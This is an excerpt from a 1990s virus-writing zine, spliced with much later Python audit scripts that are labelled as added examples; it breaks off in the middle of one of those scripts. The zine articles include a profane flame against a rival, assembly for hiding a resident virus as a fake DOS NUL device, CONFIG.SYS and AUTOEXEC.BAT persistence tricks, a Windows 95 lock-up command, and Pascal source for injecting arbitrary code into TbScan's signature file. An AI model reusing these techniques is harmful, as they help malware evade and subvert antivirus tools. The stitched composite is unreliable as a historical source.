A pretty modest boy, heh??? but that's not all. Besides this, we all in the virus scene had to stand him claiming "IRG#8 is the best zine about viruses ever released", which is a real offense to VLAD and the great work they did during their presence in the scene. Now it is when we all realise why this boy i'm talking about is so "well appreciated" among most of the mentally sane and conscious-of-what-they-say virus writers. Fortunately he retired and left the scene. IRG died. And we all lived much better since that happened, as we no longer had to stand any motherfucking candy eater telling us shit about how cool he was. While he was comfortably pulling himself at home, we all were happily having a good run of things in the virus scene. In fact everything was going almost perfect. But you know perfection does not exist. And that's why he briefly reappeared by june/july of this year, using another nick and apparently trying to hide his previous identity, and to dazzle the scene with a new virus he had written. This virus was released via IRC (as far as i know) within a ZIP file which contained, among others, a text file called "readme.1st", which started this way:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
[...]
% Important %
_____________

I do not give permission to anyone to publish this virus in their Vx zine. This means the fools who published the source to Zhengxi, 6 months after it was made publicly available, and kept rambling on about they were the zine to release the source.. they know who they are. Also, ugly children are not permitted to read this text.
[...]
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

It's a pretty curious thing to see what ENVY may drive people to do. Well, it is obviously about us, 29A, who published the original source code of Zhengxi in 29A#1, in december 1996. That's why i decided to use this section of the magazine to reply to such a stupid quote. So keep on reading my answer for the child, same as if it were an e-mail reply:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
From : Mister Sandman/29A,
To   : The Soul Manager (previously known as *********),
About: Your big mouth

Hi fool.

> I do not give permission to anyone to publish this virus in their Vx zine

Do you think i'd ever publish anything from you in 29A? not in this life...

> This means the fools who published the source to Zhengxi, 6 months after
> it was made publicly available, and kept rambling on about they were the
> zine to release the source..

You mean the same ones who kicked your ass? ah, yeh, it's us... well, i don't really give a shit what you think or don't, but i'll try to make things clear for the rest of the people who are reading this. Zhengxi was first publicly released in june 1996, but only in its binary form. And it was only a few weeks before 29A#1 was released, in december 1996, that some fortunate VXers could get the original source code for it, and that's what we eventually published, with the agreement of its author, as at that time Zhengxi was so far the most asked-for virus in the scene. And that's why we say we were the first zine to release the source, as it is the only truth. No one else did it before. Maybe this reaction is the consequence of a frustrated attempt by you and your group to be the first ones to publish it, heh?

> they know who they are.

In fact we even know who you are, despite your intention to hide yourself under a new nick (The Soul Manager) and then talk shit about us, instead of encouraging yourself to say what you think with your original nick. Pathetic. With Zhengxi or without it, you're still dead and i'm still Elvis.

Mister Sandman, chew my success.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

I would finally like to add a brief text in latin, the language which gives (actually gave) his nick to the dork i'm talking about, to describe what he exactly makes me think and the way i feel every time i hear about him. Those who can speak/translate latin will surely enjoy it a lot.

"Qvotienscvmqve tvvm cognomen avdio navseas sentio, qvotienscvmque tvos viros lego vomire volo, et vomiam ac mingam ac concvlcabo sepvltvra tva, qvod ipsa sicvt cognomen tibi fvit, atqve in ea reqviesces... cvm moriaris... si reapse aliqvando vixisti".

(In English: "Whenever I hear your nickname I feel nauseous; whenever I read your viruses I want to vomit, and I will vomit and piss and trample on your grave, because that very thing was your nickname, and in it you will rest... when you die... if indeed you ever really lived.")

Despite my initial intentions, i was about to forget about publishing this article, so it would not stand between the friendship of one of the VXers i admire most, now a 29A member, and the "guy" this article is all about, but the thing got suddenly fixed, as soon as i noticed that the infamous "Soul Manager" had broken his... friendship?, with this friend of mine just because he'd joined 29A. Pretty curious meaning of friendship. It would be very easy to be ok in the VX side, among us all (not as between AVers, because they have economy standing between their interests and them) in the virus scene, but it seems that many people don't want it to be so. Oh, and... he's giving out all his shit as he's now changing his nick again so keep your eyes open and watch out for any dork you meet. Fuck drugs off and get your rage in your ass, idiot.

Mister Sandman, bring me a dream.

Article separator > Mister Sandman/29A

What is this article used for? The answer is nothing. Its functionality is merely esthetical, as it keeps the articles separated from the executable files of the magazine. So why am i writing anything here? Well, there are still a few thingies which haven't been told in the rest of the articles and are kinda interesting or funny to read. For instance, do you know that 666 * 3 = 1998? It seems like this is gonna be a magic year for the VX side. Will AVers die? Will they be satanized? Or will they maybe get medieval in their asses? Who knows :)

Another thing you should note is the fact that we have not included any virus index in this issue. It seemed to us pretty stupid as they are described in detail both in their corresponding source and in the "29A Labs", our website... describing them one more time would be a pain.

There are also a couple of thingies pending... the password for the secret area of our previous issue was "29akewl". We accept no complaints, we didn't have much imagination at that time and were quite hurried, so... :P

The other pending thing is the importance of the new features of our improved file browser. Now it is possible to load it with or without mouse, with or without intro, and so on. And once loaded, when reading any article, you will be able to choose between smooth or hard scroll. Now it is also possible to run the payload of any virus included in our zine when having loaded its source code from within the file browser. It will also be possible, btw, to UUdecode binary files, albeit we have not implemented this feature yet. And finally, the screen saver can be loaded now just by pressing a hot-key. And note this is a DOS application, so we are not responsible for the way it may work under *your* Windows95. At least under ours it works ok.

Optional parameters to 29A#2.EXE

  i........... Don't load intro (argh!)
  m........... Enable mouse inside browser
  s........... Disable smooth scroll

File browser internal commands

  #........... Activate screensaver
  b........... Activate boss screen
  g........... Run payload (if available)
  s........... Dis/able smooth scroll
  u........... UUdecode binary (i/a)
  F1.......... Further help (lame!)

Wish us some happy VX holidays and enjoy the zine!

Mister Sandman, bring me a dream.

Playing "Hide and Seek" > "Q" the Misanthrope

It is a game of one-upmanship between the VX and the AV community. VX seems to be winning this battle but is also forcing new improvements. VX creates virus. AV creates scan strings. VX creates mutation. AV creates smart detectors. VX creates stealth. AV counters that with direct access. VX creates tunneling. AV stops that. VX creates tracing. AV stumbles. VX creates retro. AV stumbles. VX creates Stop AV from memory scanning. AV stumbles. VX creates macro viruses. AV goes nuts. VX creates new places to hide from AV. AV will probably stumble again.

Hide in NUL-Space

Wouldn't it be great to hide in a file that could not be accessed? You can. There are little things called device drivers in your PC. COM1, COM2, LPT1 and CON are examples. NUL is also a device that serves little purpose except to do nothing. An example of this: COPY *.* NUL will read all the files for errors and copy them into NUL-Space (nowhere). Try to create a file by the name of NUL, what could you do with it? An experiment is necessary.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
c:\>debug
-a
mov ah,52
int 21
int 3
-g

AX=5200  BX=0026  CX=0000  DX=0000  SP=FFEE  BP=0000  SI=0000  DI=0000
DS=0C9C  ES=00C9  SS=0C9C  CS=0C9C  IP=0104   NV UP EI PL NZ NA PO NC
0C9C:0104 CC            INT     3
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

ES:BX points to the DOS list of lists. INT 21h/AH=52h is an undocumented call and the layout of the list changed between DOS versions; the offsets below are the DOS 3.1+ layout from Ralf Brown's interrupt list, so a real implementation should check the DOS version before trusting the 22h offset. From Ralf Brown's interrupt list:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Format of List of Lists:
Offset  Size      Description
 00h    DWORD     pointer to first Drive Parameter Block
 04h    DWORD     -> first System File Table
 08h    DWORD     pointer to active CLOCK$ device's header
 [...]
 22h    18 BYTEs  actual NUL device driver header (not a pointer!)
                  NUL is always the first device on DOS's linked list of
                  device drivers
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

ES:BX+22h is what is of interest. Back to debug.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
-d es:48 l12
00C9:0040                          00 00 A6 C9 04 80 C7 0D           ........
00C9:0050  CD 0D 4E 55 4C 20 20 20-20 20                             ..NUL
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

See the word NUL at es:bx+2Ch. Let's change it to AUTOEXEC.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
-e es:52 "AUTOEXEC"
-q
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

Back to DOS.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
c:\>type c:\autoexec.bat

c:\>ren c:\autoexec.bat test.bat
Path not found

c:\>del c:\autoexec.bat
Access denied
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

Notice what happened when AUTOEXEC.BAT was in NUL-Space. It could not be read, renamed or deleted. Wouldn't this be a great way to protect our virus? Ralf Brown's list showed that the actual NUL device was only 18 bytes long. Could you just make another 18 byte NUL device by another name? The answer is YES! Here is the device format from Ralf Brown:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Format of DOS device driver header:
Offset  Size     Description
 00h    DWORD    pointer to next driver, offset=FFFFh if last driver
 04h    WORD     device attributes (see below)
 06h    WORD     device strategy entry point
                 call with ES:BX -> request header
 08h    WORD     device interrupt entry point
 0Ah    8 BYTEs  blank-padded character device name

Bitfields for device attributes:
Bit(s)  Description
 15     set (indicates character device)
 14     IOCTL supported
 13     (DOS 3.0+) output until busy supported
 12     reserved
 11     (DOS 3.0+) OPEN/CLOSE/RemMedia calls supported
 10-8   reserved
 7      (DOS 5.0+) Generic IOCTL check call supported
 6      (DOS 3.2+) Generic IOCTL call supported
 5      reserved
 4      device is special (use INT 29 "fast console output")
 3      device is CLOCK$
 2      device is NUL
 1      device is standard output
 0      device is standard input
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

From the debug experiment:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
-d es:48 l12
00C9:0040                          00 00 A6 C9 04 80 C7 0D           ........
00C9:0050  CD 0D 4E 55 4C 20 20 20-20 20                             ..NUL
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

We see that the next device in the chain is at C9A6:0000h, the attributes are 8004h and the strategy and interrupt entry points are 00C9:0DC7h and 00C9:0DCDh. The strategy and interrupt entry points for a NUL device just need to point to a RETF (they really could point anywhere since they are not used). To make our own NUL device we can do something like this:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
[...]
        mov     ah,52h                  ;get list of lists in ES:BX
        int     21h
        cld
        lds     si,dword ptr es:[bx+22h] ;NUL's "next" field: DS:SI -> 2nd device header
        push    cs                      ;ES:DI -> our device header
        pop     es
        mov     di,offset virus_device
        movsw                           ;copy the 2nd device's next pointer into ours
        movsw                           ;(we now point at the 3rd device)
        mov     word ptr ds:[si-02h],cs ;then make the 2nd device point at us
        mov     word ptr ds:[si-04h],offset virus_device
[...]
virus_device    dd      -1              ;pointer to next driver, filled in above
                dw      8004h           ;NUL character device attributes
                dw      return_far      ;strategy pointer
                dw      return_far      ;interrupt pointer
                db      "VIRUS   "      ;any name you want in NUL-Space, blank padded to 8
[...]
return_far:     retf
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

When your virus starts, have your virus create a first generation virus whose host is the standard CD 20 (terminate immediately) before it starts infecting. Name that virus C:\FDGDIKGA.PKB (pseudo random name and extension, but it should be the same for all infections on that PC). This name could be derived from the drive C: serial number:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
[...]
        mov     ax,6900h                ;get drive serial number (DOS 4.0+)
        mov     bx,0003h                ;drive C:
        push    cs
        pop     ds
        mov     dx,offset info          ;point to where serial number will be
        int     21h
        ;create file name from the drive C: serial number
        cld
        mov     si,offset serialnumber
        mov     di,offset device_name
        mov     cx,0004h                ;outer loop: 4 serial number bytes
get_serial:
        lodsb                           ;get next byte of serial number
        push    cx
        mov     cl,04h                  ;inner loop: 4 letters per byte
make_file:
        sub     al,cl
        ror     al,cl                   ;pseudo random letter
        mov     bl,al
        and     bl,0fh
        add     bl,"A"                  ;create letter from A to P
        mov     byte ptr ds:[di],bl
        inc     di                      ;save it and move pointer
        loop    make_file
        pop     cx
        loop    get_serial              ;16 letters written over name, dot, ext, nul
        mov     byte ptr ds:[file_dot],"."      ;restore dot
        mov     byte ptr ds:[asciz_nul],00h     ;restore nul
        mov     dx,offset file_name     ;now create virus by name at DS:DX
[...]
info            dw      0               ;info level, 0
serialnumber    dd      0               ;drive C: serial number
                db      19 dup(0)       ;volume label and FS type, not used
file_name       db      "C:\"
device_name     db      "VIRUS000"      ;pseudo virus name goes here
file_dot        db      ".000"          ;with pseudo extension
asciz_nul       db      00h,00h,00h,00h ;4 bytes so all 16 letters fit; byte 0 is the terminator
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

Hide it with the System and Hidden attribute, maybe even Read-Only. Now create a NUL device by the name of FDGDIKGA (same as the pseudo random file name). Add this line to CONFIG.SYS:

INSTALL=C:\FDGDIKGA.PKB

Now start infecting. Go memory resident (you really only need to have the 18 bytes of your NUL device resident). What will now happen is magic. When the PC reboots a program will load that doesn't have an executable extension, so most AV programs won't even try to scan it. If they do they won't be able to read it or delete it because it is in NUL-Space. The AV people will be able to add the scan string for your virus and remove all the children created by it, but they will not get the virus in NUL-Space. It will continue to infect again and again. Maybe only have it infect on Fridays or on the 13th of each month so it will appear that the virus has gone away but later it magically returns.

Hiding in NUL-Space and Windows 95

It works just fine with one notable exception: SCANDSKW.EXE, which is automatically launched by the System Agent, detects that there is a device by the same name as a file and will flag it. The solution is simple. Create another NUL device by the name of SCANDSKW. This stops SCANDSKW from working but doesn't flag an error.

Note: when going resident with the 18 byte NUL device, you might want to put it in the same location as the AUX device. This device is never ever used and is just wasting space. AUX is another name for COM1. PRN could be used but some older programs actually use it. LPT3's 18 bytes also could be used. The way to find the AUX device is to search the device chain:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
        mov     ah,52h                  ;get list of lists
        int     21h
        add     bx,22h                  ;ES:BX -> NUL device header
check_end:
        cmp     word ptr es:[bx],-1     ;end of chain?
        je      end_chain
        cmp     word ptr es:[bx+0ah],"UA" ;look for "AUX     "; "UA" is stored
        jne     next_device             ;low byte first, so it reads "AU" in memory
        cmp     word ptr es:[bx+0ch]," X"
        jne     next_device
[...]
        ;found AUX device at ES:BX, change the name at ES:BX+0Ah to whatever you want
[...]
        mov     word ptr es:[bx+04h],8004h ;set NUL device attributes
        jmp     short end_chain
next_device:
        les     bx,dword ptr es:[bx]    ;get next device in chain
        jmp     short check_end
end_chain:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

To see the power of NUL-Space, try this in Windows 95: md\"NUL". It locks the computer completely up.
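The device chain walk described above, together with the file/device name collision that SCANDSKW complains about, put together as a small audit tool. This is an added example for this article, not code from the original page or from "Q"; it only uses the 18-byte device header layout and the "List of Lists + 22h" rule quoted above from Ralf Brown's list. The memory image, segment addresses, device names and file list are constructed for the demonstration; against a real machine you would feed it a dump of conventional memory and the ES:BX returned by INT 21h/AH=52h.

```python
"""Walk a DOS device driver chain out of a memory image and flag NUL-Space devices.

Added example for the article above, not code from the original page. Header layout
(18 bytes, name at 0Ah) and "List of Lists + 22h = NUL header" are from the text;
the image, addresses, device names and file names below are constructed.
"""
import struct
from dataclasses import dataclass

HEADER_SIZE = 18
ATTR_CHAR_DEVICE = 0x8000      # bit 15: character device
ATTR_IS_NUL = 0x0004           # bit 2: device is NUL
LOL_NUL_OFFSET = 0x22          # NUL header embedded in the List of Lists
LAST_DRIVER_OFFSET = 0xFFFF    # next-pointer offset that ends the chain


@dataclass
class DeviceHeader:
    seg: int
    off: int
    next_seg: int
    next_off: int
    attr: int
    strategy: int
    interrupt: int
    name: str                  # 8 bytes, blank padded, as stored


def linear(seg, off):
    """Real-mode segment:offset to 20-bit linear address."""
    return ((seg << 4) + off) & 0xFFFFF


def parse_device_header(mem, seg, off):
    start = linear(seg, off)
    raw = bytes(mem[start:start + HEADER_SIZE])
    if len(raw) != HEADER_SIZE:
        raise ValueError(f"device header at {seg:04X}:{off:04X} is outside the image")
    next_off, next_seg, attr, strat, intr = struct.unpack_from("<HHHHH", raw, 0)
    return DeviceHeader(seg, off, next_seg, next_off, attr, strat, intr,
                        raw[10:18].decode("ascii", errors="replace"))


def walk_device_chain(mem, lol_seg, lol_off, limit=64):
    """Follow next pointers from the NUL header; 'limit' guards against a looped chain."""
    devices, seg, off = [], lol_seg, lol_off + LOL_NUL_OFFSET
    while len(devices) < limit:
        dev = parse_device_header(mem, seg, off)
        devices.append(dev)
        if dev.next_off == LAST_DRIVER_OFFSET:
            break
        seg, off = dev.next_seg, dev.next_off
    return devices


def find_nul_space_devices(devices, filenames=()):
    """Return (name, reason) pairs for headers that look like the hiding trick."""
    stems = {f.rsplit("\\", 1)[-1].split(".")[0].upper() for f in filenames}
    findings = []
    for i, dev in enumerate(devices):
        name = dev.name.rstrip()
        if i == 0 and name != "NUL":
            findings.append((name, "first header in the chain is not named NUL"))
        if i > 0 and dev.attr & ATTR_IS_NUL:
            findings.append((name, "NUL attribute bit set on a device other than NUL"))
        if dev.attr & ATTR_CHAR_DEVICE and name in stems:   # what SCANDSKW flags
            findings.append((name, "character device has the same name as a file"))
    return findings


def make_header(next_seg, next_off, attr, name, strat=0x0DC7, intr=0x0DCD):
    return struct.pack("<HHHHH", next_off, next_seg, attr, strat, intr) + name.ljust(8).encode("ascii")


def build_sample_memory():
    """Constructed 32 KiB image: NUL -> CON -> AUX -> hidden 'FDGDIKGA' NUL clone."""
    mem = bytearray(0x8000)
    lol_seg, lol_off = 0x00C9, 0x0026          # ES:BX as in the debug session above
    chain = [
        (0x00C9, lol_off + LOL_NUL_OFFSET, make_header(0x0100, 0x0000, 0x8004, "NUL")),
        (0x0100, 0x0000, make_header(0x0100, 0x0012, 0x8013, "CON")),
        (0x0100, 0x0012, make_header(0x0200, 0x0000, 0x8000, "AUX")),
        (0x0200, 0x0000, make_header(0x0000, LAST_DRIVER_OFFSET, 0x8004, "FDGDIKGA")),
    ]
    for seg, off, raw in chain:
        mem[linear(seg, off):linear(seg, off) + HEADER_SIZE] = raw
    return mem, lol_seg, lol_off


def audit_sample():
    """Walk the constructed image and check it against a constructed directory listing."""
    mem, seg, off = build_sample_memory()
    devices = walk_device_chain(mem, seg, off)
    files = [r"C:\FDGDIKGA.PKB", r"C:\AUTOEXEC.BAT", r"C:\CONFIG.SYS"]
    return [d.name.rstrip() for d in devices], find_nul_space_devices(devices, files)


if __name__ == "__main__":
    names, findings = audit_sample()
    print("device chain:", " -> ".join(names))
    for name, why in findings:
        print(f"FLAG {name}: {why}")
```

Two checks catch both variants in the text: the renamed real NUL header (the debug "e es:52" experiment) trips the first-header check, and an extra header carrying the NUL attribute bit, or sharing its name with a file on disk, trips the other two.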

Hide in Cypher Text

PKZIP has the ability to password protect ZIP files. This can be used to our advantage. Have the virus run this:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
PKZIP -SPASSWORD C:\VIRUS.ZIP C:\VIRUS.COM
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

And add this to the AUTOEXEC.BAT:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
@ECHO OFF
PKUNZIP -O -SPASSWORD C:\VIRUS.ZIP C:\VIRUS.COM
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

This will allow multiple reinfections but the source will not be found with a virus scanner because it will not be able to expand the ZIP file. Note that this only hides the copy inside the archive: the password sits in plain text in AUTOEXEC.BAT and the extracted C:\VIRUS.COM is an ordinary file on disk once the batch file has run, so a scanner that reads the batch file, or simply scans after AUTOEXEC.BAT has executed, still finds it.

If this is over your head, save it and come back to it when you are smarter. Have fun in NUL-Space.

Dear AV community,
You are in check! It is now your move.

"Q" the Misanthrope

TBSCAN.SIG infection > Malware

TBAV uses so called AVRs in order to add detection routines for catching polymorphic viruses that avoid its generic decryption engine. Such an AVR is just native code which is loaded and... executed! by TbScan, and is stored along with the virus signatures in the signature file TBSCAN.SIG. In other words, whoever can write TBSCAN.SIG gets to run code inside the scanner, and the only thing applied to that code is the bytewise XOR with 44h described below, which is obfuscation, not integrity protection. This signature file begins with a 128-byte-long header, in which we can find the number of 16-byte-long blocks (paragraphs) needed by the AVRs at offset 70h, stored as a word (2 bytes). At offset 72h the overall size of the virus signatures is stored, as a doubleword. That's all we need to know about the TBSCAN.SIG header in order to trojanize or infect it. The AVRs are located just after the above contents in the file, and this is the place where our virus or trojan has to be inserted. Since i do not know all the specifications of it, we can just take what is already there and modify it so there will be enough space for the new AVR code. Each AVR has a 16-byte-long header. The word at offset 0ch of this AVR header holds the size of the AVR code, including its header size. Just after this header, the AVR code (which we'll describe later) follows. And after this code we can find the virus name in ASCIIZ format. The virus name size (including the ending 0) is stored in a byte at offset 0ah of the AVR header. The total size (header+code+name) is stored as well in a word at offset 0eh in the header. Finally, the AVR code and the virus name are encrypted by a bytewise xor with 44h. IAVR, the program included below, does all this stuff so you can insert any code you want as an AVR in your TBSCAN.SIG file. You just have to call it 'IAVR filename_of_AVR_code'. If you don't specify any filename, IAVR will keep on waiting for you to type in the AVR code. Then, after it has read the code, IAVR will prompt for the virus name your AVR has to be associated with. The new signature file will then be written to a new file whose name will be TBS.SIG.
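The AVR record layout just described, as a builder and parser with the checks an operator would want before trusting a signature file. This is an added example for this article, not part of the original page, of IAVR or of TBAV: it implements only the fields the text specifies (name length at 0Ah, header+code size at 0Ch, total size at 0Eh, code and name XORed with 44h, code ending in retf); the remaining header bytes are assumed to be zero here, and the sample AVR code bytes and virus names are constructed.

```python
"""Build and inspect TBSCAN.SIG-style AVR records as described in the article above.

Added example, not code from the original page or from TBAV. Only the fields the
text documents are implemented; header bytes it does not describe are left zero
(an assumption). The sample AVR code bytes and names below are constructed.
"""
import struct

AVR_HEADER_SIZE = 16
XOR_KEY = 0x44
RETF = 0xCB
STC_RETF = bytes([0xF9, RETF])      # the "every file is infected" AVR from the text


def _xor(data):
    return bytes(b ^ XOR_KEY for b in data)


def build_avr(code, name):
    """Wrap raw AVR machine code and a virus name into one encrypted record."""
    name_z = name.encode("ascii") + b"\0"
    header = bytearray(AVR_HEADER_SIZE)
    header[0x0A] = len(name_z)                                   # name length incl. 0
    struct.pack_into("<H", header, 0x0C, AVR_HEADER_SIZE + len(code))             # header+code
    struct.pack_into("<H", header, 0x0E, AVR_HEADER_SIZE + len(code) + len(name_z))  # total
    return bytes(header) + _xor(code + name_z)


def parse_avrs(blob):
    """Split a concatenation of AVR records into [(name, code, header_ok)]."""
    records, pos = [], 0
    while pos + AVR_HEADER_SIZE <= len(blob):
        hdr = blob[pos:pos + AVR_HEADER_SIZE]
        name_len = hdr[0x0A]
        code_end, total = struct.unpack_from("<HH", hdr, 0x0C)
        if total < AVR_HEADER_SIZE or code_end < AVR_HEADER_SIZE or pos + total > len(blob):
            break                                                # truncated or corrupt record
        body = _xor(blob[pos + AVR_HEADER_SIZE:pos + total])
        code = body[:code_end - AVR_HEADER_SIZE]
        name = body[code_end - AVR_HEADER_SIZE:].rstrip(b"\0").decode("ascii", "replace")
        header_ok = total == code_end + name_len and body.endswith(b"\0")
        records.append((name, code, header_ok))
        pos += total
    return records


def audit_avrs(records):
    """Flag records worth a look before letting a scanner execute them."""
    findings = []
    for name, code, header_ok in records:
        if not header_ok:
            findings.append((name, "size fields in the AVR header do not add up"))
        if not code or code[-1] != RETF:
            findings.append((name, "AVR code does not end with retf"))
        if code == STC_RETF:
            findings.append((name, "AVR is 'stc; retf': reports every scanned file as infected"))
    return findings


# Constructed sample: a plausible-looking AVR (cmp byte ptr [bx],0E9h / jne +1 / stc / retf)
# followed by the trojan "stc; retf" AVR shown in the article.
SAMPLE_GOOD_CODE = bytes([0x80, 0x3F, 0xE9, 0x75, 0x01, 0xF9, 0xCB])


def sample_sig_blob():
    return build_avr(SAMPLE_GOOD_CODE, "Poly.Sample") + build_avr(STC_RETF, "Trojan_AVR")


if __name__ == "__main__":
    recs = parse_avrs(sample_sig_blob())
    for name, code, ok in recs:
        print(f"{name:16s} code={code.hex():16s} header_ok={ok}")
    for name, why in audit_avrs(recs):
        print(f"FLAG {name}: {why}")
```

Because the XOR key is fixed, the parser recovers every AVR in clear; comparing the decoded records against a known-good copy of TBSCAN.SIG (or just hashing the file) is the real defence, the audit above only catches the crude cases.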
And now, before including my program IAVR, let's have a look at the format of any AVR code. It's quite simple relocatable code. If it returns with the carry flag set, it's telling TbScan that the virus was found. The AVR code has to be ended with a retf instruction. The rest is just normal code, so you can program as usual and insert anything you want there. This is an example of an AVR which flags every file as infected:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
        .model tiny
        .code
        org 100h
start:
        stc                             ; carry set = "virus found"
        retf
end start
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

And finally, the Pascal source of my IAVR program, which is able to add any AVR to TBSCAN.SIG, writing the resulting file as TBS.SIG. You can find the compiled executable version of this program in the \FILES directory of this issue of 29A.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
uses Crt;

const Name : String = 'Default_Virus';

type PWord = ^Word;

var F1,F2,F3   : File;
    ML,L,i,BP1 : word;
    OP,Size_   : LongInt;
    Buffer     : Array[0..$2000] of Byte;

begin
  Size_:=0;
  assign(F1,'tbscan.sig'); Reset(f1,1);         { open original signature file }
  assign(F2,'tbs.sig'); rewrite(f2,1);          { create new signature file }
  assign(F3,ParamStr(1)); reset(F3,1);          { open file with code to insert }
  blockread(F1,Buffer,$80);                     { read header of signature file }
  blockwrite(F2,Buffer,$80);                    { and simply write it to new one }
  blockread(f1,buffer,$1fff);                   { read first 1FFF byte of orig. }
  blockread(f3,buffer[$10],$2000,L);            { read upto 2000 byte of code }
  L:=L+$10;                                     { add size of header for AVR }
  Buffer[$0c]:=L and $FF;                       { write header size into buffer }
  Buffer[$0d]:=L div $100;
  Write('Name :'); Readln(Name);                { ask for a name for the virus }
                                                { thats detected by the new AVR }
  For i:=1 to Ord(Name[0]) do
    Buffer[L+I-1]:=Ord(Name[i]);                { write it into buffer }
  Buffer[L+Ord(Name[0])]:=0;                    { and end it with a zero }
  L:=L+Ord(Name[0])+1;                          { add length of name to size }
  Buffer[$0a]:=Ord(name[0])+1;                  { store length of name }
  Buffer[$0e]:=L and $FF;                       { and full length of AVR }
  Buffer[$0f]:=L div $100;
  for i:=$10 to L do
    Buffer[I]:=Buffer[I] XOR $44;               { encrypt the new AVR }
  blockwrite(f2,buffer,L);                      { and write it to new sig.-file }
  ML:=L;
  seek(f1,$80);                                 { seek back to top of original }
                                                { AVRS }
  { now write the rest of the original signature file to the new one }
  L:=$2000;
  While L=$2000 do
  Begin
    BlockRead(F1,Buffer,L,L);
    BlockWrite(F2,Buffer,L);
  End;

  Seek(F2,$80);                                 { begin right after header again }
  Repeat
    OP:=FilePos(f2);                            { save position we have in file }
    blockread(f2,buffer,$1fff);                 { read a bit from file }
    if Buffer[1]=$FF then                       { is it a control entry ? }
    begin                                       { yes, is control entry }
      for i:=$10 to Buffer[$0e]+word(buffer[$0f])*256 do
        Buffer[I]:=Buffer[I] XOR $44;           { decrypt it }
      i:=Buffer[$0c]+word(buffer[$0d])*256;     { ??? }
      OP:=OP+Buffer[$0e]+word(buffer[$0f])*256; { add size of entry to position }
                                                { in file }
      Size_ := Size_ + Buffer[$0e]+word(buffer[$0f])*256; { summarize all sizes }
      Seek(F2,OP);                              { seek to position after entry }
    end;
  Until Eof(F2) or ( Buffer[1]<>$FF );

  If Not( Eof(F2) ) then
  Begin
    BP1 := 0;                                   { now the signatures }
    while (Buffer[BP1]<>0) do                   { repeat until end of this }
    begin                                       { signature-block }
      Size_ := Size_ + Buffer[BP1+8] + Buffer [BP1+7] + 10; { add size of entry }
      BP1:=Buffer[BP1+8]+$A+BP1+Buffer[BP1+7];  { here too }
      if BP1>=$1E00 then                        { we need a new part of file to }
      begin                                     { read sometimes }
        Seek(F2,OP+LongInt(BP1));
        OP:=OP+LongInt(Bp1);
        BlockRead(F2,Buffer,$2000);
        BP1:=0;
      end;
    end;
    Size_ := Size_ + $81;                       { somehow 129 byte was missed }
    Seek(F2,$70);
    BlockRead(F2,Buffer,6);                     { read 6 byte from offset $70 }
    Seek(F2,$70);
    PWord(@Buffer[0])^:=PWord(@Buffer[0])^ + ( (ML+15) DIV 16 ); { add para size of new AVR code }
    Buffer[2]:=Size_ and $FF;                   { write new size of signatures }
    Buffer[3]:=( Size_ SHR 8 ) and $FF;
    Buffer[4]:=( Size_ SHR 16 ) and $FF;
    Buffer[5]:=( Size_ SHR 24 ) and $FF;
    BlockWrite(F2,Buffer,6);                    { write the 6 byte back to file }
  End;
  Close(F1); Close(F2); Close(F3);
end.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

Malware
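The same layout can be walked in the other direction: an administrator who wants to know what native code a TBSCAN.SIG on disk will hand to TbScan can enumerate the AVR entries, decrypt their names, and check that each entry's size fields agree with each other. The following Python routine is an added example for that audit, not the article's IAVR program. It uses only the layout the article gives (128-byte header, paragraph count at 70h, signature size at 72h, 16-byte AVR headers with the name length at 0ah, code size at 0ch, total at 0eh, body XORed with 44h) plus two assumptions: that an AVR header carries 0FFh at offset 1, which is the test IAVR's own source applies to recognise a control entry, and that the paragraph count in the header must cover all AVR bytes. The sample file is constructed inline; the other header bytes in it are simply left zero.

```python
"""Audit helper for the TBSCAN.SIG layout described above (added example, not the
article's IAVR program).  Walks the AVR entries, decrypts their names and code and
reports inconsistencies a tampered or corrupted signature file would show.  The AVR
code is only decoded and inspected, never run."""
import struct

HEADER_LEN = 0x80      # signature file header (from the article)
AVR_HDR_LEN = 0x10     # per-AVR header (from the article)
XOR_KEY = 0x44         # AVR code and name are XORed bytewise with 44h (from the article)
RETF = 0xCB            # opcode of a far return; the article says every AVR ends with retf
CONTROL_MARK = 0xFF    # assumption: IAVR's source tests this byte at offset 1 of an AVR header


def build_avr(code: bytes, name: str) -> bytes:
    """Constructed test data only: one AVR entry in the layout the article gives."""
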